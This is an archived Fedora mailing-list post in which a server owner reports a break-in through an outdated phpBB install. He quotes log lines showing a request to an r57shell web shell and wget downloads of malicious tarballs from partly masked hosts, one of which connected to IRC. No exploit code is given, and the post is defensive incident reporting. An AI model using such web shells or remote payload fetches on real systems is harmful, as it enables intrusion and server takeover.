Hacked Server WAS: Strange connection

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

> -----Original Message-----
> From: fedora-list-bounces@xxxxxxxxxx 
> [mailto:fedora-list-bounces@xxxxxxxxxx] On Behalf Of Levent Duymus
> Sent: Wednesday, July 20, 2005 11:39 AM
> To: For users of Fedora Core releases
> Subject: Re: Strange connection
> 
> 
> also you should give much more detailed report about the suspicious 
> activity if exists.



Conclusion.
This is what I've found.
I'm not running awstats, so it's not responsible.
As it transpired phpBB must have been used. phpBB 2.0.8, "forgot" it was
there, it was only used for testing purposes, But someone found it.


Firstly I noticed that I had a strange connection when I ran "netstat  -a
-v -p -t"

It said that I was connected to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"


In the httpd access log I found:

172.149.xxx.xxx - r57 [02/Jul/2005:16:05:10 +0200] "POST
/phpBB2/r57shell.php HTTP/1.1" 200 11581

This is a backdoor trojan.
It is not linked to any file, so it must been used by the hacker to gain
access to my server

In the httpd error logs I found this:

--21:34:47--  http://www.xxxx.ro/www/gulie.tgz
           => `gulie.tgz'
Slår upp www.xxxx.ro... 217.10.xxx.xxx       (Finding.....)
Ansluter till www.xxxxx.ro[217.10.xxx.xxx]:80... ansluten. (Connecting
to.......connected)
HTTP-begäran skickad, väntar på svar... 200 OK (HTTP request sent, waiting
for answer)
Längd: 229,187 [application/x-tar] (Length....)

    0K .......... .......... .......... .......... .......... 22%  119.67
KB/s
   50K .......... .......... .......... .......... .......... 44%  279.43
KB/s
  100K .......... .......... .......... .......... .......... 67%  358.69
KB/s
  150K .......... .......... .......... .......... .......... 89%  304.26
KB/s
  200K .......... .......... ...                             100%  406.82
KB/s

21:34:48 (233.38 KB/s) - "gulie.tgz" sparad [229187/229187]

Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html

This one was responsible for the connection to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"
It was located in /var/tmp


I also found this in the error-logs
--16:02:53--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   53.66
KB/s

16:02:55 (53.66 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

--16:02:55--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   49.24
KB/s

16:02:56 (49.24 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

bind: Address already in use
--16:03:36--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   75.51
KB/s

16:03:37 (75.51 KB/s) - "roots.tar" sparad [30720/30720]

--16:03:37--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   68.40
KB/s

16:03:38 (68.40 KB/s) - "roots.tar" sparad [30720/30720]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
Cant open port
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key

These last ones has left no trace on the hd's at all.

Anyway, backed up the serve for now, reinstal in the near future I think,
need to download the latest cor though.

With best regards

Tomas Larsson
Sweden

Verus Amicus Est Tamquam Alter Idem

Attachment: smime.p7s
Description: S/MIME cryptographic signature

[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux